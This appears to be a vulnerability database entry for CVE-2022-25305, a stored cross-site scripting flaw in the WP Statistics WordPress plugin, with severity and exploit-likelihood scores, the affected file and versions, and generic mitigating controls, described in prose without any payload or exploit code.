CVE-2022-25305
Published: 24 February 2022
Summary
CVE-2022-25305 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Veronalabs Wp Statistics. Its CVSS base score is 7.2 (High).
Operationally, ranked in the top 7.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
Deeper analysis
The WP Statistics WordPress plugin is vulnerable to cross-site scripting in versions up to and including 13.1.5. The flaw is caused by insufficient escaping and sanitization of the IP parameter in the includes/class-wp-statistics-ip.php file, which permits injection of arbitrary web scripts that execute when administrators view site statistics. The issue is tracked as CWE-79 and carries a CVSS 3.1 score of 7.2.
An unauthenticated attacker can supply a crafted IP value over the network that is stored and later rendered without proper output encoding. When an administrator loads the statistics pages, the injected script runs in the administrator’s browser context, enabling actions such as session hijacking or unauthorized configuration changes within the WordPress site.
Public references include a Wordfence vulnerability advisory and WordPress plugin repository changesets that document the corrective commit, indicating that administrators should apply the available plugin update to remove the vulnerable code path. The associated EPSS score has remained flat at 0.0788 with no observed upward trajectory after disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2022-29989
Vulnerability details
The WP Statistics WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the IP parameter found in the ~/includes/class-wp-statistics-ip.php file which allows attackers to inject arbitrary web scripts onto several pages that execute when site…
more
administrators view a sites statistics, in versions up to and including 13.1.5.
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Penetration testing submits XSS payloads to web applications, detecting cross-site scripting flaws for subsequent remediation.
Validates web inputs to reject script-related content that could produce XSS.
Output validation against expected content can reject or sanitize script content in generated web pages, reducing XSS exploitability.